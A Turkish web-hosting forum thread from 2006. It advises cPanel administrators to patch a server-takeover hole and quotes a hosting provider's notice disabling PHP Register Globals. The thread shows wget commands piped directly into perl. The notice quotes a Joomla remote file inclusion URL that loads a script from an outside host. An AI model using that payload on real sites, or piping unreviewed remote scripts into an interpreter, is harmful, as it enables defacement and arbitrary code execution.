CPanel Kullanan Arkadaşların Dikkatine

CPanel'de bulunan yeni bir açık nedeniyle komple sunucu ele geçirilme tehdidi altında..
Bu sabah cpanel'in forumlarına girince farkettim

Çözüm : Cpanel sürümlerinizi EDGE veya CURRENT build'lere yükseltmek..


http://**.***.**.***:2086/scripts2/updateconf
Buraya girip

cPanel/WHM Updates
Automatic (STABLE tree)
Automatic (RELEASE tree)
[x]Automatic (CURRENT tree)

seçili halde

http://**.***.**.***:2086/scripts2/upcpform
Buradan cpanellerinizi upgrade edin

veya ssh'a girip /scripts/upcp yazın

CPanel Update ile uğraşmak istemeyenler için 2.seçenek [daha temiz yol]

SSH'a girin
wget -q -O - http://layer1.cpanel.net/installer/sec092506.pl | perl
yazın
Patch olayı tamamlanınca patchi test edin
wget -q -O - http://layer1.cpanel.net/installer/c...cker_092406.pl cpanel_exploit_checker_092406.pl | perl
patch testinden başarılı geçince aşağıdaki gibi bir mesaj verir
Hostgator - Exploited by Hackers (Merged) - WebHostingTalk Forums
cPanel Forums

zaten bıton saldırı var bıde bununla ugrasmayak,saolasın osman

saldırı için ayrı bişiler yazarım

Reseller Zoom'da Register Globals'i OFF yapmış.
Detayları:

We will be making a server configuration change related to PHP Register
Globals at the date below. If you are NOT using PHP for your website
you can disregard this notice. Currently PHP Register Globals is set to
ON across our entire network of servers and will be changed to OFF. You
will find a mini FAQ regarding this change below.

Server: Lewis
Change Date: Sunday October 1, 2006

Why are we making this change?

When Register Globals is ON, you can overwrite variables in PHP scripts
by appending them to the URL, e.g. script.php?myvar=42 would define a
variable myvar with the value of 42. Depending on how your script works
this could be a security risk which was the case with many of the
scripts within Fantastcio being hacked/compromised.

An example was Mambo/Joomla scripts being exploited by including the
following in the requested URL:

components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://*****.com/oki/lol.txt?

The example above shows how easy it is to call an external script by
using the calender component in Jooma to deface the website. PHP has set
Register Globals default value to OFF since version 4.2.0 as noted here
in the first line: http://us3.php.net/register_globals.

What can happen as a result of this change?

Old/outdated scripts still depending on Register Globals to be ON will
have problems as those scripts need Register Globals to be on in order
to work.

What can be done to prevent/resolve any problems caused as a result of
this change?

Most scripts have dropped the need of Register Globals to be ON or have
custom workarounds to this issue. Upgrading to the latest version of
the script could possibly resolve any problems caused by this change. We
also recommend contacting your script developer if you're unsure to see
if Register Globals turned ON is a requirement. Other solutions
include:

1- Contacting your script developer to make changes to the script so it
does not rely on Register Globals to be enabled.

2- If your scripts need Register Globals enabled for the use of
GET/POST/COOKIE variables then you can add the following in the fileheader:

import_request_variables('GPC');

If you need other variables like SERVER use the function extract().

3- If you need Register Globals ON then you can upload a custom php.ini
file in your scripts directory to negate this change (this means your
scripts will be vulnerable to being exploited). You can find a custom
php.ini file at the URL below with Register Globals turned ON. Simply
upload it to your scripts directory and name it php.ini to override the
change on the server.